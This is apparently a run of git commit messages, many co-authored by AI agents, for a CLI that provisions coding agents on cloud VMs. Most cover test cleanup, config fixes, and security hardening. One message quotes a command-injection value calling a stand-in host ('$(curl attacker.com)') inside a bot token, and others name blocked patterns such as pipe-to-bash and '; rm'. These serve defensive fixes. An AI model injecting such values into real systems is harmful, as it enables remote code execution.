The "should match at exactly distance 3" test in findClosestMatch was
using "clau" as input (distance 2 from "claude"), which was identical
to the "should match at distance 2" test immediately below it.
Fixed by using "cla" as input, which is genuinely distance 3 from "claude"
(requires inserting u, d, e), correctly testing the threshold boundary.
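The two distances can be checked with a textbook Levenshtein implementation. This is a minimal sketch; `levenshtein` is an illustrative helper and is not claimed to be the routine findClosestMatch uses internally.

```typescript
// Classic dynamic-programming Levenshtein distance:
// each insertion, deletion, or substitution costs 1.
function levenshtein(a: string, b: string): number {
  // prev[j] = distance between the first i-1 chars of a and the first j chars of b.
  let prev: number[] = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    const curr: number[] = [i];
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      curr[j] = Math.min(
        prev[j] + 1, // delete from a
        curr[j - 1] + 1, // insert into a
        prev[j - 1] + cost, // substitute or match
      );
    }
    prev = curr;
  }
  return prev[b.length];
}

console.log(levenshtein("clau", "claude")); // 2
console.log(levenshtein("cla", "claude")); // 3
```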
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
- Remove stale top-level `discovery.sh` reference from CLAUDE.md file
structure (the file was never in the repo; actual script lives at
`.claude/skills/setup-agent-team/discovery.sh`)
- Fix `autonomous-loops.md` rule that referenced `./discovery.sh --loop`
with the correct path to the actual discovery script
No functional code changes. All 1400 tests pass, biome lint clean.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
Remove --beta <feature> row from the commands table in README — this flag is
not listed in getHelpUsageSection() in commands/help.ts, which is the source
of truth for the commands table.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
PR #2567 fixed the openclaw modelDefault in code but missed the manifest
interactive_prompts field. Also update discovery.md Hetzner entry from
the old CX22/€3.29 to the current cx23/€3.49.
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Adds a "None" option at the top of the setup options multiselect
prompt, pre-selected by default. This fixes two UX issues:
1. Users can now explicitly skip all setup steps by selecting "None"
(or pressing Enter with it pre-selected) — previously impossible
once another option was selected.
2. Arrow keys now respond immediately because multiple items are
available to navigate from the start.
Strips the __none__ sentinel from the returned step set so no
behavioural change occurs when the user selects "None".
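A minimal sketch of the sentinel stripping, assuming the prompt returns the selected values as an array of strings. `stripNoneSentinel` is a hypothetical name, not the function in the codebase.

```typescript
// Sentinel value named in this commit message.
const NONE_SENTINEL = "__none__";

// Hypothetical helper: drop the sentinel so callers only ever see real step names.
function stripNoneSentinel(selected: readonly string[]): Set<string> {
  return new Set(selected.filter((step) => step !== NONE_SENTINEL));
}

console.log(stripNoneSentinel(["__none__"]).size); // 0
console.log([...stripNoneSentinel(["__none__", "browser"])]); // ["browser"]
```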
Fixes #2569
Agent: issue-fixer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Each `openclaw config set` does a read-modify-write on the config file,
which can drop fields written by uploadConfigFile — including
gateway.auth.token. This caused the OpenClaw dashboard to return
"Unauthorized" on every fresh deploy.
Fix: after the browser config set and plugin enable blocks, re-set
gateway.auth.token via `openclaw config set` (same non-fatal pattern as
the existing Telegram token call), ensuring the token survives all
read-modify-write cycles.
Fixes #2570
Agent: issue-fixer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
When multiple machines ran `spawn claude aws`, they all registered their
SSH public key under the hardcoded name "spawn-key". The second machine
would find the key already exists and skip import — but the instance got
provisioned with Machine A's key, causing Permission denied on all SSH
retries for Machine B.
Fix: derive the key pair name from the first 8 hex chars of SHA256 of
the public key content (e.g. `spawn-key-a1b2c3d4`). Different machines
get different key names, eliminating the collision entirely.
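A minimal sketch of the naming scheme, assuming the public key is available as a string. `keyPairName` is a hypothetical helper, and the key strings in the usage lines are placeholders.

```typescript
import { createHash } from "node:crypto";

// Hypothetical helper: name the key pair after the first 8 hex chars
// of the SHA-256 digest of the public key content.
function keyPairName(publicKey: string): string {
  const digest = createHash("sha256").update(publicKey).digest("hex");
  return `spawn-key-${digest.slice(0, 8)}`;
}

// Placeholder key material for illustration only.
const nameA = keyPairName("ssh-ed25519 AAAA-placeholder-machine-a");
const nameB = keyPairName("ssh-ed25519 AAAA-placeholder-machine-b");
console.log(nameA !== nameB); // different keys map to different names
```

The same key always maps to the same name, so a machine re-running the command still finds its own key.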
Fixes #2565
Agent: issue-fixer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Telegram and WhatsApp plugins are disabled by default in OpenClaw.
Setting a bot token without enabling the plugin causes the gateway
to hang on startup. Running `openclaw channels login --channel
whatsapp` without the plugin enabled fails with "Unsupported channel".
Now runs `openclaw plugins enable telegram/whatsapp` before any
channel configuration. Also adds step-by-step instructions for
getting a Telegram bot token from @BotFather.
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
The model ID `openrouter/openrouter/auto` had a double `openrouter/` prefix
which failed validateModelId() (requires exactly one slash in provider/model
format). This caused the model to be silently ignored on every OpenClaw
launch, falling back to no model default.
Fix: use the correct `openrouter/auto` model ID in both modelDefault field
and the fallback in setupOpenclawConfig().
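The failure mode can be illustrated with a stand-in check. This sketch only models the "exactly one slash" rule described above; `hasProviderModelShape` is hypothetical and the real validateModelId() may enforce more.

```typescript
// Hypothetical stand-in for the provider/model shape check:
// exactly one slash, with non-empty text on both sides.
function hasProviderModelShape(modelId: string): boolean {
  const parts = modelId.split("/");
  return parts.length === 2 && parts.every((part) => part.length > 0);
}

console.log(hasProviderModelShape("openrouter/openrouter/auto")); // false
console.log(hasProviderModelShape("openrouter/auto")); // true
```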
Fixes #2566
Agent: issue-fixer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
The --model flag was listed twice in two user-facing outputs:
- help.ts USAGE section: lines 11 and 20 both showed --model <id>
with different descriptions
- index.ts unknown-flag error: lines 118 and 121 both showed --model
with different descriptions
Both duplicates were introduced when --model support was added.
Combined the two entries into one clear line each.
Agent: ux-engineer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
jsonEscape() produces double-quoted strings ("value") which allow
shell command substitution $(...) inside bash. A malicious
TELEGRAM_BOT_TOKEN like "$(curl attacker.com)" would execute on
the remote VM when openclaw config is set.
shellQuote() uses POSIX single-quote escaping which prevents all
shell expansion. Every other user-supplied value in agent-setup.ts
(GITHUB_TOKEN, git user.name, git user.email) correctly uses
shellQuote — the bot token was the only exception.
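A minimal sketch of the difference, assuming shellQuote follows the usual POSIX single-quote idiom with a null-byte check. JSON.stringify stands in for jsonEscape() here; neither function body is copied from the repository.

```typescript
// Sketch of POSIX single-quote escaping: wrap in '...' and rewrite each
// embedded ' as '\'' (close quote, escaped quote, reopen quote).
function shellQuote(value: string): string {
  if (value.includes("\0")) {
    throw new Error("null byte in shell argument");
  }
  return "'" + value.replace(/'/g, "'\\''") + "'";
}

const token = "$(curl attacker.com)";
// Double quotes: bash still performs command substitution inside them.
console.log(JSON.stringify(token)); // "$(curl attacker.com)"
// Single quotes: bash treats everything inside as literal text.
console.log(shellQuote(token)); // '$(curl attacker.com)'
```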
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
HeadlessOptions is defined and used internally in commands/run.ts but
re-exported from commands/index.ts with no consumer — index.ts imports
cmdRunHeadless but passes options inline without importing the type.
This is a CLI binary, not a library, so unused re-exports add surface
area without value.
Also move the run.ts comment to be adjacent to the run.ts exports.
Bump CLI version to 0.17.4.
-- qa/code-quality
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
- Consolidate 4 separate SPAWN_PROMPT/SPAWN_MODE env var tests in
cmdrun-happy-path.test.ts into 2 tests. Each previously spawned a
separate bash subprocess to check a single env var; the consolidated
tests check both vars in one subprocess invocation, halving overhead.
- Remove redundant KNOWN_FLAGS.has() assertions from steps-flag.test.ts.
The findUnknownFlag() call already exercises the Set membership check —
the extra .has() assertion was pure duplication. Also removes the now-
unused KNOWN_FLAGS import.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
New users don't know how to get a bot token. Show instructions
before the prompt: open @BotFather, send /newbot, copy the token.
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
ZeroClaw's latest GitHub release (v0.1.9a) ships no binary assets.
The --prefer-prebuilt bootstrap path hits a 404, falls back to Rust
source compilation, and exceeds the 600s install timeout — causing
zeroclaw to fail on all clouds (digitalocean, gcp, hetzner, sprite).
Fix: replace the bootstrap invocation with a direct curl download from
v0.1.7-beta.30 (the last release that ships linux-gnu prebuilt binaries)
into ~/.local/bin. This completes in seconds vs ~20 minutes for a source
build, and removes the swap-space setup step that was only needed for
memory-intensive compilation.
Also remove the now-unused ensureSwapSpace function and update the E2E
verify check to also look in ~/.local/bin for the zeroclaw binary.
-- qa/e2e-tester
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
PickOption, PickConfig, and PickResult interfaces in picker.ts were exported
but never imported by any external module. SpawnConfig type in spawn-config.ts
was similarly exported but not used outside the module. Made all four private
to reduce the public API surface.
Bump CLI patch version to 0.17.2.
-- qa/code-quality
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
Dead backwards-compat re-export left over from the shellQuote
consolidation (PRs #2533, #2535, #2546). Zero consumers import
shellQuote from gcp/gcp.ts — all correctly import from shared/ui.ts.
Per CLAUDE.md: avoid backwards-compatibility hacks; delete unused code.
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Remove 2 tests from the manifest-integrity.test.ts "structure" describe
block that can never fail:
- "should parse as valid JSON": manifest.json is already parsed via
JSON.parse() at module scope (line 23). If parsing fails, the module
throws and ALL tests fail — this individual test can never provide
an independent failure signal.
- "should have agents, clouds, and matrix top-level keys": after parsing,
Object.keys(manifest.agents/clouds) and Object.entries(manifest.matrix)
are called at module scope (lines 25-27). If those properties were
missing, the module load itself would throw. This test is also guaranteed
to pass whenever any test in the file runs.
Removing these 2 theatrical tests leaves 1403 tests (down from 1405).
All remaining tests provide real signal.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
* feat: add Telegram and WhatsApp options to OpenClaw setup picker
Adds separate "Telegram" and "WhatsApp" checkboxes to the OpenClaw
setup screen:
- Telegram: prompts for bot token from @BotFather, injects into
OpenClaw config via `openclaw config set`
- WhatsApp: reminds user to scan QR code via the web dashboard
after launch (no CLI setup possible)
Updates USER.md with channel-specific guidance when either is selected.
Bump CLI version to 0.16.16.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* feat: run WhatsApp QR scan interactively before TUI launch
Instead of punting WhatsApp setup to "after launch", runs
`openclaw channels login --channel whatsapp` as an interactive SSH
session between gateway start and TUI launch. The user scans the
QR code with their phone during provisioning setup.
Flow: gateway starts → tunnel set up → WhatsApp QR scan → TUI launch
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: update WhatsApp hint to reflect pre-TUI QR scanning
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* feat: add --config and --steps CLI flags for programmatic setup
Add --config <path> flag to load spawn options from a JSON config file
(model, steps, name, setup data like telegram_bot_token). Add --steps
<list> flag for comma-separated setup step control. Both enable the
web UI and headless automation to control which setup steps run.
Priority order: CLI flags > --config file > env vars > defaults.
- New spawn-config.ts module with valibot validation
- OptionalStep extended with dataEnvVar and interactive metadata
- validateStepNames() for step name validation with warnings
- Telegram setup reads TELEGRAM_BOT_TOKEN env var before prompting
- WhatsApp auto-skipped in headless mode with warning
- promptSetupOptions() skipped when SPAWN_ENABLED_STEPS already set
- E2E verify helpers for github, browser, telegram setup artifacts
- QA reference file documenting all agent setup options
- Version bump to 0.17.0
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* feat: add --model flag and priority order tests
- Add --model <id> CLI flag that sets MODEL_ID env var
- --model is extracted before --config so it takes priority
- Add config-priority.test.ts with 8 tests verifying:
- --model overrides config model
- --steps overrides config steps
- --steps "" disables all steps
- --name overrides config name
- Config tokens apply as defaults
- Explicit env vars override config tokens
- Remove preferences.json from priority order docs (not needed)
- Add --model to help text and unknown-flag guidance
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* docs: add --model, --config, --steps to README
Document config file format, setup steps table, and new CLI flags
in the commands table.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: address security review feedback
- Move null byte check before path resolution (defense-in-depth)
- Move agent-setup-options.md from .claude/rules/ to .docs/ (git-ignored)
per documentation policy
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: resolve rebase conflicts and deduplicate --model flag extraction
Rebase on main introduced a duplicate --model flag extraction block
(one from the PR at line 804, one from main at line 941). Consolidated
into the single early extraction point with -m shorthand support.
Also removed duplicate --model entry from KNOWN_FLAGS set.
Agent: pr-maintainer
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Set every agent's featured_cloud to ["digitalocean", "sprite"] — one
primary recommendation (DigitalOcean) and one fallback (Sprite).
Co-authored-by: Claude <claude@anthropic.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
- soak.sh: SOAK_CLOUD env var makes cloud configurable (default: sprite)
- qa.sh: load TELEGRAM_BOT_TOKEN, TELEGRAM_TEST_CHAT_ID, SOAK_CLOUD from
/etc/spawn-qa-auth.env in soak mode
- qa.yml: add weekly Monday 3am UTC scheduled soak trigger
- fix: bun eval → bun -e across soak.sh, key-request.sh, github-auth.sh
(bun eval is not a valid subcommand in bun 1.3.9)
- fix: export _TOKEN via env prefix so process.env._TOKEN works in bun -e
- docs: update shell-scripts.md rule to say bun -e (not bun eval)
Verified: 3/4 Telegram tests pass in smoke test on DigitalOcean (120s wait):
getMe ✓, sendMessage ✓, getWebhookInfo ✓; the cron test needs the full 55-min window.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
The previous PR (#2536) set the Codex default to gpt-5.1-codex, but the
latest available on OpenRouter is gpt-5.3-codex. Also adds a rules file
documenting each agent's default model to prevent future regressions.
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
Adds --model / -m CLI flag to override the agent's default LLM model:
spawn codex gcp --model openai/gpt-5.3-codex
Also supports persistent per-agent model preferences via config file at
~/.config/spawn/preferences.json:
{ "models": { "codex": "openai/gpt-5.3-codex" } }
Priority: --model flag > preferences file > agent default.
This enables a future web UI to pass model selection via CLI args when
invoking spawn programmatically to provision machines.
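The priority order can be sketched as a simple fallback chain. `resolveModel` and the `Preferences` type are hypothetical; only the file shape `{ "models": { ... } }` comes from this commit message.

```typescript
// Shape of ~/.config/spawn/preferences.json as described above.
interface Preferences {
  models?: Record<string, string>;
}

// Hypothetical resolver: --model flag > preferences file > agent default.
function resolveModel(
  flagValue: string | undefined,
  prefs: Preferences,
  agent: string,
  agentDefault: string,
): string {
  return flagValue ?? prefs.models?.[agent] ?? agentDefault;
}

const prefs: Preferences = { models: { codex: "openai/gpt-5.3-codex" } };
// "some/default" is a placeholder agent default for illustration.
console.log(resolveModel(undefined, prefs, "codex", "some/default")); // openai/gpt-5.3-codex
```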
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
Junie was added as a fully implemented agent (manifest, agent scripts,
agent-setup.ts) but the packer/tarball pipeline was never updated.
This meant the nightly agent-tarballs workflow could not build a
pre-built tarball for Junie, forcing all deployments to do a live
npm install.
- Add junie entry to packer/agents.json (tier: node, @jetbrains/junie-cli)
- Add junie to capture-agent.sh allowlist and path-capture case
(npm-based, same as codex/kilocode — captures /root/.npm-global/)
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Remove redundant existsSync check inside icon-integrity "is actual PNG
data" tests — the file existence is already verified in the preceding
test, and isPng() will throw if the file is missing.
Remove the "should detect multiple dangerous patterns" test from
validatePrompt — it retests the same $(…), backtick, ; rm, and |bash/sh
patterns that each have their own dedicated it() block immediately above.
Fix misleading test description: "should accept scripts with comments
containing dangerous patterns" — the test actually expects a throw
(documented as a known trade-off). Rename to "should reject…".
Removes 1 test (1381 → 1380) and 18 expect() calls.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
* security: add DO_CLIENT_SECRET env var override
Allows users/organizations to supply their own DigitalOcean OAuth
client secret via DO_CLIENT_SECRET env var rather than relying on
the bundled default. The bundled secret remains as fallback.
Fixes #2537
Agent: security-auditor
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
* chore: bump CLI version to 0.16.19
Agent: security-auditor
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
---------
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Three root-cause bugs in input test functions:
1. Stdin pass-through broken: cloud_exec uses "printf '...' | base64 -d | bash"
on the remote, meaning bash reads the script from its own stdin — not the
outer process's stdin. "PROMPT=$(base64 -d)" inside the script was reading
from the already-consumed pipe, always producing an empty prompt.
Fix: embed the base64-encoded prompt directly in the remote command string.
Base64 output is [A-Za-z0-9+/=] only — safe to embed in single-quoted strings.
2. Zeroclaw flag wrong: "zeroclaw agent -p" was passing the prompt as
--provider (not --prompt). The correct flag for non-interactive single-message
mode is "-m"/"--message".
3. Codex model stale: "openai/gpt-5-codex" does not exist on OpenRouter.
Updated to "openai/gpt-5.1-codex" which is available.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
PR #2533 hardened GCP with shellQuote() and null-byte rejection, but
left Hetzner, DigitalOcean, AWS, and connect.ts using inline
.replace(/'/g, "'\\''") without null-byte validation.
- Move shellQuote to shared/ui.ts as the single source of truth
- Add null-byte validation to runServer in Hetzner, DO, and AWS
- Replace inline shell escaping with shellQuote in interactiveSession
across all clouds, connect.ts, and agents.ts buildEnvBlock
- Re-export shellQuote from gcp.ts for backwards compatibility
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Consolidate 9 per-credential-type it() blocks in prompt-file-security.test.ts
into a single data-driven test covering all 17 sensitive path patterns.
Merge 2 validatePromptFileStats "accept" tests into one.
Consolidate 4 unicode/encoding-attack it() blocks in security.test.ts
into a single data-driven test. Merge 3 "accept identifier" it() blocks into one.
Removes 19 redundant tests (1400 → 1381) with no loss of coverage.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
- Add null-byte rejection to shellQuote (defense-in-depth)
- Export shellQuote for testability
- Refactor interactiveSession to use shellQuote instead of inline escaping
- Add comprehensive test suite for shellQuote security properties
Fixes #2529
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Consolidate 8 fragmented pipe-to-bash/sh tests in validatePrompt into 2
data-driven tests covering all inputs (with/without whitespace, complex
pipelines, and standalone word acceptance). Merge 3 backtick tests into 1.
Merge 2 whitespace tests into 1. Removes 19 lines of duplicate test setup.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
The identical generateCsrfState() helper existed in both
digitalocean/digitalocean.ts and shared/oauth.ts. Export it from
oauth.ts (which digitalocean.ts already imports) and remove the
duplicate copy.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
Add base64 character validation ([A-Za-z0-9+/=]) before use in SSH
command strings for gcp.sh, aws.sh, and hetzner.sh cloud_exec
functions -- matching the existing fix in digitalocean.sh (#2528).
Also add a validated _encode_b64 helper to soak.sh and use it for
all Telegram bot token encoding, preventing corrupted base64 from
breaking out of single-quoted SSH command strings.
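The check itself is small. The real helpers are bash functions; this TypeScript sketch only illustrates the character-class test, and `isSafeBase64` is a hypothetical name.

```typescript
// Only the standard base64 alphabet plus padding is allowed, and the
// value must be non-empty. None of these characters can close a
// single-quoted shell string.
const BASE64_CHARS = /^[A-Za-z0-9+\/=]+$/;

function isSafeBase64(encoded: string): boolean {
  return BASE64_CHARS.test(encoded);
}

const encoded = Buffer.from("echo hello", "utf8").toString("base64");
console.log(isSafeBase64(encoded)); // true
console.log(isSafeBase64("abc'; rm -rf /")); // false
```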
Closes #2527
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Add explicit base64 character validation in _digitalocean_exec after
encoding the command, matching the existing pattern in provision.sh.
This ensures the encoded value contains only [A-Za-z0-9+/=] before
embedding it in the SSH command string.
Note: #2527 (provision.sh base64 validation) was already fixed in a
prior commit — the validation at lines 284-289 already rejects
non-base64 characters and empty output.
Fixes #2526
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
Replace `if (!r.ok) { expect(...) }` and `if (result.ok) { return }` guards
with unconditional assertions using toThrow() or toMatchObject(). These
conditional blocks silently skipped assertions when the condition evaluated
the wrong way, providing false confidence. Also remove now-unused tryCatch
imports from prompt-file-security.test.ts and security.test.ts.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
* test: add cron-triggered Telegram reminder to soak test
Tests OpenClaw's ability to stay alive and execute scheduled tasks.
Installs a one-shot cron on the VM before the 1h soak wait that sends
a Telegram message at ~55 min, then verifies the message was sent
after the wait completes. Also moves Telegram config injection before
the soak wait so the cron can use the bot token immediately.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* test: use OpenClaw's cron scheduler instead of system crontab
Replaces the raw system cron approach with OpenClaw's built-in cron
scheduler (`openclaw cron add`). This properly tests that OpenClaw's
gateway stays alive after 1 hour and can execute scheduled tasks.
The test now:
1. Injects Telegram config + schedules an OpenClaw cron job (--at +55min)
2. Waits 1 hour (soak)
3. Verifies the job fired via `openclaw cron runs` and `openclaw cron list`
Uses --delete-after-run for one-shot semantics. Verification checks both
the run history and the auto-deletion as proof of execution.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* test: verify cron message on Telegram side via forwardMessage
Instead of trusting OpenClaw's self-reported cron status, we now verify
the message actually exists in the Telegram chat:
1. Extract message_id from OpenClaw's cron execution logs (tries
`openclaw cron runs`, then ~/.openclaw/cron/ directory)
2. Call Telegram's forwardMessage API with that message_id
3. If Telegram can forward it → message EXISTS in the chat (proof
from Telegram itself, not OpenClaw)
This catches cases where OpenClaw reports success but the message
never actually reached Telegram.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: address security review findings in soak test
- Add validate_positive_int() and validate SOAK_WAIT_SECONDS +
SOAK_CRON_DELAY_SECONDS at startup (prevents command injection via
crafted env vars)
- Validate TELEGRAM_TEST_CHAT_ID is numeric in soak_validate_telegram_env
- Use per-app marker file /tmp/.spawn-cron-scheduled-${app} to avoid
race conditions when multiple soak tests run on the same VM
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
When provisioning hits a 422 "droplet limit exceeded" response, wait 30s
and retry up to 3 times. Makes E2E suite resilient to transient limit hits
during parallel batch provisioning.
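A minimal sketch of the retry loop, assuming "up to 3 times" means one initial attempt plus at most three retries. `createWithRetry`, `isLimitExceeded`, and the `ApiResponse` shape are hypothetical and are not the E2E script's actual code.

```typescript
interface ApiResponse {
  status: number;
  body: string;
}

// Hypothetical predicate for the 422 "droplet limit exceeded" case.
function isLimitExceeded(res: ApiResponse): boolean {
  return res.status === 422 && res.body.includes("droplet limit exceeded");
}

// Retry only on the limit error, waiting between attempts.
// sleep is injectable so the loop can be exercised without real delays.
async function createWithRetry(
  create: () => Promise<ApiResponse>,
  sleep: (ms: number) => Promise<void> = (ms) =>
    new Promise((resolve) => setTimeout(resolve, ms)),
  maxRetries = 3,
  waitMs = 30_000,
): Promise<ApiResponse> {
  let res = await create();
  for (let retry = 0; retry < maxRetries && isLimitExceeded(res); retry++) {
    await sleep(waitMs);
    res = await create();
  }
  return res;
}
```

Any other error status is returned immediately, so only transient limit hits pay the 30s wait.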
Fixes #2516
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Previously, _digitalocean_max_parallel() always returned 3, assuming all
quota slots were available. When pre-existing droplets occupy slots, the
batch-3 parallel runs fail with "droplet limit exceeded" API errors.
Now queries /v2/account for the actual droplet_limit and subtracts the
current droplet count to compute available capacity. Falls back to 3 if
the API is unreachable.
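The capacity arithmetic can be sketched as below. The real function is bash; `availableSlots` is a hypothetical TypeScript stand-in, and clamping at zero is an assumption not stated in this commit.

```typescript
// Hypothetical stand-in: available capacity = account limit - droplets in use.
// undefined inputs model an unreachable API, which falls back to 3.
function availableSlots(
  dropletLimit: number | undefined,
  currentCount: number | undefined,
  fallback = 3,
): number {
  if (dropletLimit === undefined || currentCount === undefined) {
    return fallback;
  }
  // Assumption: never report negative capacity.
  return Math.max(0, dropletLimit - currentCount);
}

console.log(availableSlots(10, 8)); // 2
console.log(availableSlots(undefined, undefined)); // 3
```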
-- qa/e2e-tester
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
OpenClaw requires the openrouter/ provider prefix for model IDs.
The previous default (moonshotai/kimi-k2.5) was missing the prefix,
causing "Unknown model" warnings. Reverted to openrouter/openrouter/auto
which uses OpenRouter's auto-router to pick the best model per prompt.
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
Replace `if (result.ok) { expect(result.data)... }` guards with
`expect(result).toMatchObject({ ok: true, data: ... })`. The old pattern
silently skips inner expects when the condition is false — `toMatchObject`
asserts both discriminant and value in a single unconditional call.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
DO_DROPLET_SIZE default documented as s-2vcpu-4gb ($24/mo) but code and manifest
both use s-2vcpu-2gb ($18/mo). Also fixes stale getUserHome() source reference in
testing rules (shared/paths.ts, not shared/ui.ts).
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
#2507 pre-selected all setup options. Only browser should default to
enabled — GitHub CLI and reuse-saved-key are opt-in.
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
The two getTerminalWidth tests only checked that the function returns
a number >= 80. Since the implementation is `process.stdout.columns || 80`,
both assertions are trivially satisfied in any environment and provide
zero regression signal. Removed them along with the unused import.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
When Sprite (or another cloud) times out during provisioning, provision.sh
falls back to constructing .spawnrc manually over SSH. The claude and codex
agents were missing from the agent-specific case block, so:
- claude: ANTHROPIC_BASE_URL and ANTHROPIC_AUTH_TOKEN were never written,
causing verify_claude's openrouter.ai check to fail
- codex: OPENAI_API_KEY and OPENAI_BASE_URL were never written
Discovered during E2E run: sprite/claude failed with .spawnrc timeout +
missing openrouter.ai in fallback .spawnrc.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
PR #2505 migrated all bun -e → bun eval across shell scripts but
missed 2 instances in sh/shared/key-request.sh (lines 32 and 61).
This completes the migration for consistency.
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
The multiselect picker for setup options (Chrome browser, GitHub CLI,
etc.) started with nothing selected. Now all available options are
pre-selected so users get the full setup by default.
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
* fix: bump quality cycle timeout to 90 min and recognize gcp cli auth
